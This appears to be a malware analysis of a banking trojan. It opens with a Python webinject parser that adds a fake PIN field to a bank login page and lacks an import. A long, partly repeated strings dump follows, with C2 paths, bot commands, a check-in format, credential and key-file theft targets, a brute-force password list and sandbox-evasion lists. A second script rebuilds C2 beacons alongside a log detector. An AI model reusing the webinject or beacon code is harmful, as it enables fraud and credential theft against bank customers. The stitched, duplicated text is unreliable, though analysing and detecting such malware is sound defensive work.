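from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Inject:
    url_mask: str          # wildcard mask, as on the set_url line
    flags: str = ""        # trailing letters on set_url (e.g. GP); meaning assumed
    before: str = ""       # data_before ... data_end
    inject: str = ""       # data_inject ... data_end
    after: str = ""        # data_after ... data_end


def parse_webinjects(text: str) -> List[Inject]:
    """Turn a config into Inject records. Each data_* block runs until data_end."""
    injects: List[Inject] = []
    current: Optional[Inject] = None
    section: Optional[str] = None
    buf: List[str] = []
    for raw in text.splitlines():
        if section is not None:                 # inside a data_* block
            if raw.strip() == "data_end":
                setattr(current, section, "\n".join(buf))
                section, buf = None, []
            else:
                buf.append(raw)
            continue
        line = raw.strip()
        if not line:
            continue
        if line.startswith("set_url"):
            parts = line.split(None, 2)
            if len(parts) < 2:
                raise ValueError("set_url without a URL mask")
            current = Inject(url_mask=parts[1], flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            if current is None:
                raise ValueError(f"{line} before any set_url")
            section = line[len("data_"):]
        else:
            raise ValueError(f"unexpected line: {line!r}")
    if section is not None:
        raise ValueError("data block not closed with data_end")
    return injects


def apply_injects(url: str, html: str, injects: List[Inject]) -> str:
    """Rewrite html as the hooked browser would see it: for every matching
    set_url, the text between data_before and data_after is replaced by
    data_inject (an empty data_after means insert right after data_before)."""
    out = html
    for inj in injects:
        if not fnmatch.fnmatchcase(url, inj.url_mask):
            continue
        start = out.find(inj.before)
        if start < 0:
            continue
        start += len(inj.before)
        if inj.after:
            end = out.find(inj.after, start)
            if end < 0:
                continue
        else:
            end = start
        out = out[:start] + inj.inject + out[end:]
    return out


# Constructed sample config: add a PIN field after the password box on a login page.
SAMPLE_CONFIG = """\
set_url https://bank.example/login* GP
data_before
<input type="password" name="pass">
data_end
data_inject
<input type="text" name="pin" placeholder="PIN">
data_end
data_after
data_end
"""

# Constructed page the bank would actually serve.
SAMPLE_HTML = ('<form method="post"><input type="text" name="user">'
               '<input type="password" name="pass"><button>Login</button></form>')


if __name__ == "__main__":
    print(apply_injects("https://bank.example/login?step=1", SAMPLE_HTML,
                        parse_webinjects(SAMPLE_CONFIG)))
```

The injection happens inside the browser process after TLS is stripped, which is why the hooks sit on PR_Read/PR_Write and InternetReadFile rather than on the socket; a server-side check of the served HTML will never see the extra field.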
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
%02u.bmp
***************************
***************************
[/pst]
GetClipboardData
\\.\PhysicalDrive%u
AppEvents
Console
Control Panel
Environment
Identities
Software
System
/topic.php
keylog.txt
passwords.txt
%s%u.zip
-----------------------------
Content-Disposition: form-data; name="pcname"
-----------------------------
Content-Disposition: form-data; name="file"; filename="report"
Content-Type: text/plain
RtlUniform
TranslateMessage
GetMessageA
GetMessageW
as743vgk0odastr
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.microsoft.com
Content-Length:
RtlFreeHeap
id=1&post=%u
frd.exe
!kill_os
&ret_val=ok
/faq.php
!activebc
&activebc=ok
!deactivebc
&deactivebc=ok
&load=ok
!inject
&inject=ok
!new_config
&config=ok
id=%s&ver=4.2.5&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
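The format string just above spells out the check-in body, the `!`-prefixed tokens are the commands the bot accepts and the `&...=ok` fragments are the acknowledgements it appends afterwards; the fixed MSIE 2.0 User-Agent, the HTTP/1.0 line, the google.com Referer and the `.php` paths appear a few lines earlier. The Python below is an added example, not code from the sample or the report: it fills the format string the way the bot would, parses a reply for commands, and runs a small detector over proxy records. The meaning of the os/rights/ltime fields, the assumption that a reply carries commands as bare tokens, and the sample records are mine; the format string, tokens, paths and UA are verbatim from the dump.

```python
"""Check-in body, command tokens and acknowledgements as the strings spell
them out, wrapped in a small detector for proxy logs. Added example: the
format string, UA, paths and tokens come from the dump; field meanings,
the reply shape and the sample records are assumptions."""
import re
from typing import Dict, List, Optional

# Format string of the check-in body, verbatim from the dump (Python accepts %u as %d).
BEACON_FMT = "id=%s&ver=4.2.5&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d"
BEACON_RE = re.compile(
    r"^id=(?P<id>[^&]+)&ver=(?P<ver>\d+(?:\.\d+)*)&up=(?P<up>\d+)&os=(?P<os>\d{3})"
    r"&rights=(?P<rights>[^&]*)&ltime=(?P<ltime>[^&]*)&token=(?P<token>-?\d+)$")
UPLOAD_RE = re.compile(r"^id=\d+&post=\d+$")   # the second body shape, id=1&post=%u

# The hard-coded User-Agent. "MSIE 2.0" together with "Trident/4.0" (the IE8
# engine) is a combination no real browser ever sent, so it is a clean match.
HARDCODED_UA = ("Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; "
                "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
                "Media Center PC 6.0)")
C2_PATHS = ("/login.php", "/topic.php", "/faq.php", "/home.php")

# Command token -> fragment appended to the next request (pairs as listed in the dump).
COMMAND_ACKS = {
    "!kill_os": "&ret_val=ok",
    "!activebc": "&activebc=ok",
    "!deactivebc": "&deactivebc=ok",
    "!inject": "&inject=ok",
    "!new_config": "&config=ok",
}


def build_beacon(bot_id: str, up: int, os_code: int, rights: str,
                 ltime_sign: str, ltime_hours: int, token: int) -> str:
    """Fill the format string. Which values the bot puts into os/rights/ltime is
    not recoverable from the strings; the argument names are assumptions."""
    return BEACON_FMT % (bot_id, up, os_code, rights, ltime_sign, ltime_hours, token)


def parse_beacon(body: str) -> Optional[Dict[str, str]]:
    m = BEACON_RE.match(body)
    return m.groupdict() if m else None


def commands_in(reply: str) -> List[str]:
    """Pull known command tokens out of a C2 reply (that they appear as bare
    '!'-tokens in the body is an assumption)."""
    return [t for t in re.findall(r"![a-z_]+", reply) if t in COMMAND_ACKS]


def ack_suffix(commands: List[str]) -> str:
    """What the bot appends to its next beacon after executing the commands."""
    return "".join(COMMAND_ACKS[c] for c in commands)


def flag_requests(records: List[Dict[str, str]]) -> List[str]:
    """Detection over proxy records {src, url, ua, body}; returns one reason per hit."""
    reasons: List[str] = []
    for r in records:
        path = re.sub(r"^https?://[^/]+", "", r["url"]).split("?", 1)[0]
        if parse_beacon(r["body"]) or UPLOAD_RE.match(r["body"]):
            reasons.append(f'{r["src"]}: bot check-in body to {path}')
        if path in C2_PATHS and r["ua"] == HARDCODED_UA:
            reasons.append(f'{r["src"]}: hard-coded MSIE 2.0/Trident UA to {path}')
    return reasons


# Constructed proxy records: one beacon, one report upload, one ordinary request.
SAMPLE_RECORDS = [
    {"src": "10.0.4.17", "url": "http://c2.example/login.php", "ua": HARDCODED_UA,
     "body": build_beacon("7A1F0C33", 42, 61, "admin", "+", 3, 12345)},
    {"src": "10.0.4.17", "url": "http://c2.example/topic.php", "ua": HARDCODED_UA,
     "body": "id=1&post=2"},
    {"src": "10.0.4.22", "url": "http://www.bing.com/", "ua": "Mozilla/5.0",
     "body": ""},
]

if __name__ == "__main__":
    for reason in flag_requests(SAMPLE_RECORDS):
        print(reason)
    print(ack_suffix(commands_in("!new_config !inject")))
```

The body regex is the more durable of the two signals: the UA can be changed in a rebuild, but the check-in layout is what the server side parses and tends to survive across versions.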
\chrome.exe
--no-sandbox
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_username=
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
CryptoPluginId=AGAVA&Sign
login=
password=
&ctl00%24MainMenu%24Login1%24UserName=
&ctl00%24MainMenu%24Login1%24Password=
advapi32.dll
CryptEncrypt
WSASend
WSARecv
name=%s&port=%u
/home.php
A B V G D E E J Z I Y K L M N O P R S T U F H C CHSHSH Y E YUYAA B V H G D E JE J Z Y I YI J K L M N O P R S T U F X C CH SH SH YU YA
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\%02d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
\private\
private.txt
\public\
public.txt
\*.key
\self.cer
\@rand
\ABONENTS*
crypto
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
found.
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
\crypto\
\micros~\crypto\
\maxthon3\public\
\microsoft\crypto\
\crypto pro\
\progra~1\crypto~1\
\temporary internet files\
:\users\public
\ryptopro
\cryptokit\
:\progra~1\common~1\crypto~1
bsi.dll
&cvv=&
&cvv2=
&cvv2=&
&cvc=&
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
FAKTURA
sks2xyz.dll
vb_pfx_import
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
BEGIN SIGNATURE
END SIGNATURE
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
DefaultPrivateDir
General
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
&txtSubId=
&txtPin=
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone=
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
RCN_R50Buffer
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
\SIGN1\
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
RSTYLE
Agava_Client.exe
UseToken
Containers
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
login.yota.ru
IDToken1=
IDToken2=
YotaConfirmForm%5Bpassword%5D
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
IsWow64Process
*SYSTEM*
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
kernel
waveOutOpen
winmm.dll
1234567890QWERTYUIOPASDFGHJKLZXCVBNM
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
inconsistent bit counts
not enough codes
too many codes
bad compressed size
ct_tally: bad match
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
RFB 003.006
LibVNCServer 0.9.7
unknown
%s (%s)
My Documents
Network Favorites
%02d/%02d/%04d %02d:%02d
No authentication mode is registered!
Your viewer cannot handle required authentication methods
password check failed!
SCardConnectA
SCardEstablishContext
SCardFreeMemory
SCardDisconnect
SCardListReadersA
SCardReleaseContext
WinSCard.dll
IsNetworkAlive
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MiniDumpWriteDump
dbghelp.dll
strstr
calloc
malloc
_snprintf
_strrev
strtol
isdigit
sprintf
strncpy
fwrite
realloc
fclose
isprint
strchr
MSVCRT.dll
GetModuleFileNameExA
PSAPI.DLL
NetApiBufferFree
NetQueryDisplayInformation
NETAPI32.dll
DnsFlushResolverCache
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetSetStatusCallback
InternetQueryOptionA
InternetConnectA
InternetReadFile
HttpOpenRequestA
InternetCheckConnectionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
WS2_32.dll
SHGetFolderPathA
ShellExecuteA
ExtractIconExA
SHFileOperationA
SHGetSpecialFolderPathA
SHELL32.dll
StrStrIA
PathFileExistsA
PathFindFileNameA
PathAddBackslashA
StrStrIW
StrToIntA
PathMakeSystemFolderA
PathAppendA
StrCmpNIA
StrNCatA
StrStrA
StrChrIA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
ntdll.dll
GetVolumeInformationA
GetSystemWindowsDirectoryA
GetModuleFileNameA
GetLastError
SetLastError
GetProcAddress
GetModuleHandleA
IsDebuggerPresent
GetTickCount
GetEnvironmentVariableA
GetCurrentProcess
AddVectoredExceptionHandler
GetCurrentThreadId
GetCurrentProcessId
GetSystemDefaultLangID
Process32First
GetTimeFormatA
GetDateFormatA
OpenProcess
GetTimeZoneInformation
Process32Next
CreateToolhelp32Snapshot
WaitForSingleObject
LoadLibraryExA
ReleaseMutex
lstrcpynA
GetTempFileNameA
WaitForMultipleObjects
GetTempPathA
GetSystemTime
CreateFileA
SetFilePointer
MoveFileExA
SetEndOfFile
SetFilePointerEx
UnlockFile
LockFile
WriteFile
IsBadWritePtr
ReadFile
CreateDirectoryA
GetFileSizeEx
FindFirstFileA
RemoveDirectoryA
SetFileAttributesA
FindClose
FindNextFileA
DeleteFileA
HeapReAlloc
HeapAlloc
HeapFree
ExitProcess
SetErrorMode
SetEvent
OpenMutexA
lstrcpyA
MapViewOfFile
UnmapViewOfFile
IsBadReadPtr
CreateFileMappingA
GlobalLock
GlobalAlloc
CreateProcessA
MultiByteToWideChar
GlobalUnlock
GlobalFree
CreateThread
HeapCreate
lstrcmpiA
OpenEventA
lstrcmpiW
OpenFileMappingA
CreateMutexA
GetComputerNameA
lstrlenA
CreateEventA
GetVersionExA
ResetEvent
GetCommandLineA
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetCurrentThread
GetDriveTypeA
SetThreadPriority
SetCurrentDirectoryA
GetLogicalDriveStringsA
CopyFileA
GetCurrentDirectoryA
GetProcessHeap
HeapValidate
HeapSize
GetCommandLineW
ExitThread
MoveFileA
WinExec
TerminateThread
FindNextChangeNotification
FindFirstChangeNotificationA
lstrcmpA
CloseHandle
FlushInstructionCache
InterlockedExchange
VirtualAlloc
GetThreadPriority
VirtualProtect
WideCharToMultiByte
GetVersionExW
GetFileAttributesA
GetFileAttributesW
GetShortPathNameA
GetPrivateProfileStringA
VirtualQuery
VirtualFree
CreateRemoteThread
GetProcessTimes
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Module32Next
LocalFree
WriteProcessMemory
SwitchToThread
FileTimeToDosDateTime
GetFileSize
SystemTimeToFileTime
GetLocalTime
LocalAlloc
GetFileType
GetFileInformationByHandle
FindFirstFileW
FileTimeToSystemTime
CreateFileW
lstrlenW
FindNextFileW
KERNEL32.dll
CharUpperA
FindWindowA
GetSystemMetrics
SetCaretBlinkTime
SetThreadDesktop
GetThreadDesktop
ReleaseDC
GetShellWindow
GetWindow
DestroyIcon
SetClipboardData
OpenClipboard
GetDesktopWindow
EmptyClipboard
GetIconInfo
RegisterWindowMessageA
SendMessageA
WindowFromPoint
DrawIcon
CreateDesktopA
GetTopWindow
CloseClipboard
SendMessageW
IsWindowVisible
IsWindow
GetLastActivePopup
PostMessageW
IsIconic
MapVirtualKeyW
IsRectEmpty
GetClassLongA
GetWindowThreadProcessId
MapWindowPoints
PostMessageA
GetMenuItemInfoA
SetWindowPos
SendMessageTimeoutA
GetWindowLongA
GetAncestor
GetWindowInfo
GetParent
GetWindowRect
GetSystemMenu
DefWindowProcW
EndMenu
HiliteMenuItem
DefMDIChildProcA
GetCursor
GetMenuItemCount
DefMDIChildProcW
DestroyCursor
DefWindowProcA
GetMenuState
CopyIcon
TrackPopupMenuEx
GetMenuItemRect
GetMenu
MenuItemFromPoint
GetSubMenu
SetKeyboardState
GetMenuItemID
OpenDesktopA
GetUserObjectInformationA
PrintWindow
WindowFromDC
SetLayeredWindowAttributes
EnumChildWindows
RedrawWindow
GetWindowRgn
SetClassLongA
SetWindowLongA
GetScrollBarInfo
MoveWindow
DialogBoxIndirectParamA
SetWindowTextA
ShowWindow
EndDialog
GetDlgItem
CreateWindowExA
GetWindowTextLengthA
GetClientRect
LoadIconA
AttachThreadInput
DestroyWindow
wsprintfA
PtInRect
GetFocus
RealChildWindowFromPoint
GetClassNameA
GetCursorPos
GetWindowTextW
GetOpenClipboardWindow
GetActiveWindow
GetWindowTextA
GetGUIThreadInfo
GetKeyboardState
ToAscii
FindWindowW
DispatchMessageW
PeekMessageW
TranslateMessage
MsgWaitForMultipleObjects
GetWindowDC
USER32.dll
GetDeviceCaps
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
GdiFlush
GetDIBits
CreateDIBSection
DeleteDC
CreateRectRgn
OffsetRgn
SelectClipRgn
SetViewportOrgEx
GetViewportOrgEx
BitBlt
GetClipRgn
GetObjectA
CreateFontIndirectA
GDI32.dll
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
RegCloseKey
RegSetValueExA
RegFlushKey
RegDeleteValueA
RegEnumKeyExA
RegNotifyChangeKeyValue
OpenProcessToken
GetTokenInformation
RegDeleteKeyA
ADVAPI32.dll
memcpy
memset
_except_handler3
>?456789:;<=
 !"#$%&'()*+,-./0123
;3+#>6.&
'2, /+0&7!4-)1#
O/o_?
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
Desk_%u%x
-xFS]
!nuca?B
h2A co*SSFQ37
JD4?'
gTC/L7dkto
;EOUhq_
S@9':] "^znztV=
'h?c ,Z
D"N47T0h|-
qX_Ro.)}eM2UY.
[rPfmV8Q
t[jq+a:U
k"_}1I{D7
n3r4Nnf
||~hYk
.Y+t~2MlUj
sI)79B
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
;W;^;;;
<#<2<<==*>?>L>
M1T182?2L2S2Y2e2u222T3k3z33333
44/4;4K4P4444
595B5H5a5
55555%6;6_6n6666
99"::::;;;*<4<><H<R<\<f<p<<)====1>t>|>>>>>>>>>>>>>>>>
?"?(?0?7?|?????
1T11422
3(4}44Q5a5566v8a99/:: ;;;s==k>>>>
)0111111111111
2@2S2e2233<4D444^666
7;7V7n7t7
777777X8e8
:T::::
;/;5;B;K;T;Z;g;p;
>:>r>>>>>>>
S0Z0`0k0w0
00000000
111D1Y1111Z222
33*4j44444
66666&7d7/8\8u888
99::K;j;s;;;;$>>
1-2222L3Q3]3d334I6666j77777
8!81888d993:A:k::y;;;W<{<<<4=a====
>7>>>d>>>l??
0r00D1W1111
3,3u333333333333333
4H4%55557,99F::V;;[<|<<<
=B============
1122i3s3355f6666666
99O;;<<2=f===$>>>
I0'1:1T1e1194j4~444
5'5555u66B7Y7`77848G888
9)9b99999999:::1;F;[;;;;0<E<<<
>->:>v>>>>>>>S?Z?`?k?w?
0*020F0q0w0
101611B2d223344559:F:T;a;b<<
122C2B3f37
88$9299B:c:/;;9<J>>
0#112-3555566666
7#7w7748-999#;J=
4:::::::::::
;P;c;u;;<<L=T===??????????
00s222222222233b5555555555v666;X<<9==>>>>>>>
S0d0m0~000000000000
11(161?1M1V1d1i33 4'464@4T4c4r4|44444444
4i445W6666#7&8585<==
%4N4]477
0(060B0M0
1>1h1111
2 2.2722222333333}45==x>>>>>>;?I?q?z????
1*161111122
35:e:::
;I;U;;;;;
<4<d<<|====
?j?t???
66H7V7d7r777
8@8I8x888J9999
:k:u:::l;;;;;
2%33333
4j4~44444$55<6F6Z6f666667*848B8K8>>5?C?Q?_????
0$0-0\0s00>1111
2|222233
4E:u::
;;K;W;;;;;
<3<x<<====<>F>[>d>c?????
1E11111
3>33`4j4z4444
55I6S6a6j67
8888888O9c99999
::0;:;J;V;;;;;<
=#=1=:=>>]?k?y????
030R0\0000g1
2+272222233333u55
6+696H6v6666
7K7c77'88888O9Y9k9t9B::::: >
{11w33)5D5R556779H<=?
4181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|11111111111111111&202@2>>
6%666U7g7<<<<<<
=E=p===>??????????
033o5v5558888949:9B9
;,;8;D;P;\;h;t;;;
======
5,5@5H5L5P5T5X5\5`5d5h5l5p5t5x5|555555555555555??????????????????????
0 0$0(0,0004080<0@0D0H0L0P0T000
12253s335
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
This program cannot be run in DOS mode.
.rdata
.data
.reloc
OLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
SystemDrive
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
\\?\globalroot\systemroot\system32\drivers\ntfs.sys
ntdll.dll
RtlUniform
kernel32.dll
IsWow64Process
kernel
server
idontknow
administrator
666666
12345678
soccer
abc123
password1
football1
fuckyou
monkey
iloveyou1
superman1
slipknot1
jordan23
princess1
liverpool1
monkey1
baseball1
123abc
qwerty1
blink182
myspace1
user111
098765
qweryuiopas
qwerty
111111
password
123456
Windows Defender
MpClient.dll
WDEnable
\\.\KmxAgent
____AVP.Root
\\.\pipe\acsipc_server
\AVG\AVG9\dfncfg.dat
\AVG\AVG9\dfmcfg.dat
\PrevxCSI\csidb.csi
Tue Aug 2 12:53:17 2011
winlogon.exe
explorer.exe
\apppatch\
svchost.exe
user32.dll
HARDWARE\DESCRIPTION\System
SystemBiosVersion
test_item.exe
SANDBOX
MALNETVM
VIRUSCLONE
test user
\sand-box\
\cwsandbox\
\sandbox\
_snprintf
strstr
_snwprintf
wcsstr
MSVCRT.dll
SHGetFolderPathA
SHELL32.dll
PathFileExistsA
StrStrIA
PathAddBackslashA
PathAppendA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
RtlAdjustPrivilege
ntdll.dll
IsDebuggerPresent
GetTickCount
GetVolumeInformationA
GetEnvironmentVariableA
GetModuleFileNameA
CreateFileA
SetFilePointer
MoveFileExA
lstrcpynA
SetEndOfFile
UnlockFile
LockFile
SetFileTime
WriteFile
IsBadWritePtr
ReadFile
GetFileSizeEx
GetLastError
SetFileAttributesA
GetTempFileNameA
GetFileTime
GetTempPathA
DeleteFileA
GetProcAddress
GetModuleHandleA
HeapAlloc
HeapFree
GetProcessHeap
HeapValidate
GetCurrentProcess
FlushInstructionCache
VirtualAlloc
VirtualQuery
Process32First
VirtualFree
CreateRemoteThread
OpenProcess
CreateProcessA
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Process32Next
CreateToolhelp32Snapshot
Module32Next
CloseHandle
WriteProcessMemory
SwitchToThread
GetSystemWindowsDirectoryA
FreeLibrary
GetSystemTimeAsFileTime
GetModuleFileNameW
SetCurrentDirectoryA
MoveFileA
DeviceIoControl
ExitProcess
GlobalAddAtomA
GlobalFindAtomA
CopyFileA
GetCurrentProcessId
InterlockedDecrement
CreateFileW
GetVersionExA
KERNEL32.dll
FindWindowA
CharUpperA
PostMessageA
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegOpenKeyExA
RegFlushKey
RegCloseKey
OpenProcessToken
GetTokenInformation
GetUserNameA
ADVAPI32.dll
CoCreateInstance
CoUninitialize
CoInitializeEx
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
_except_handler3
memset
memcpy
This program cannot be run in DOS mode.
.data
.reloc
This program cannot be run in DOS mode.
.rdata
.data
.reloc
name.key
\secrets.key
sign.key
kernel32.dll
CreateFileW
\explorer.exe
GetFileAttributesW
user32.dll
GetWindowTextA
OLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
SystemDrive
Software\Microsoft\Windows NT\CurrentVersion
InstallDate
SYSTEM
%s!%s!%08X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
software\microsoft
Global\
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
%dd %dh %dm
CLOSED
LISTEN
SYN_SENT
SYN_RCVD
FIN_WAIT1
FIN_WAIT2
CLOSE_WAIT
CLOSING
LAST_ACK
TIME_WAIT
DELETE_TCB
netstat
{Proto
Local address
Remote address
taskmgr
Process name
[System Process]
netuser
Software\Microsoft\Internet Explorer\TypedURLs
IE history:
DAN NLD NLB ENU ENG ENA ENC ENZ ENI FIN FRA FRB FRC FRS DEU DES DEA ISL ITA ITS NOR NON PTB PTG SVE ESP ESM ESN TRK PLK CSY SKY HUN RUS GRE ALL
{BotVer:
{Process:
{Username:
PROCESSOR_IDENTIFIER
{Processor:
{Language:
%dx%d@%d
{Screen:
dd:MMM:yyyy
{Date:
HH:mm:ss
{Local time:
%c%d:%02d
{GMT:
{Uptime:
{Windows directory:
{Administrator:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
Dnsapi.dll
DnsQuery_A
DnsQuery_UTF8
DnsQuery_W
Query_Main
ws2_32.dll
getaddrinfo
gethostbyname
inet_addr
qwrtpsdfghjklzxcvbnm
eyuioa
1676d5775e05c50b46baa5579d4fc7
!verif
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
6d3ad29879a90b4dd1b4f76e82166ca3
data.txt
ntdll.dll
ZwQuerySystemInformation
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_%08x
explorer.exe
Shell_TrayWnd
taskmgr
default
DefWindowProcW
DefWindowProcA
DefDlgProcW
DefDlgProcA
DefFrameProcW
DefFrameProcA
DefMDIChildProcW
DefMDIChildProcA
CallWindowProcW
CallWindowProcA
RegisterClassW
RegisterClassA
RegisterClassExA
RegisterClassExW
PeekMessageW
PeekMessageA
OpenInputDesktop
OpenDesktopA
OpenDesktopW
SwitchDesktop
MessageBeep
FlashWindowEx
GetCursorPos
SetCursorPos
GetMessagePos
SetCapture
ReleaseCapture
GetCapture
Winmm.dll
PlaySoundW
PlaySoundA
sndPlaySoundW
sndPlaySoundA
Kernel32.dll
Gdi32.dll
SetDIBitsToDevice
SetThreadDesktop
static
Content-Length
http://
NSS layer
https://
Referer
Content-Type
HTTP/1.
Transfer-Encoding
chunked
Connection
Proxy-Connection
identity
Accept-Encoding
If-Modified-Since
nspr4.dll
PR_Write
PR_Read
PR_Close
PR_OpenTCPSocket
PR_GetError
PR_SetError
PR_GetNameForIdentity
UserAgent
[[[URL: %s
Process: %s
User-agent: %s]]]
Accept-Encoding:
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
InternetCloseHandle
set_url
data_before
data_end
data_inject
data_after
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
%02u.bmp
***************************
***************************
[/pst]
GetClipboardData
\\.\PhysicalDrive%u
AppEvents
Console
Control Panel
Environment
Identities
Software
System
/topic.php
keylog.txt
passwords.txt
%s%u.zip
-----------------------------
Content-Disposition: form-data; name="pcname"
-----------------------------
Content-Disposition: form-data; name="file"; filename="report"
Content-Type: text/plain
RtlUniform
TranslateMessage
GetMessageA
GetMessageW
as743vgk0odastr
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.microsoft.com
Content-Length:
RtlFreeHeap
id=1&post=%u
frd.exe
!kill_os
&ret_val=ok
/faq.php
!activebc
&activebc=ok
!deactivebc
&deactivebc=ok
&load=ok
!inject
&inject=ok
!new_config
&config=ok
id=%s&ver=4.2.5&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
\chrome.exe
--no-sandbox
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
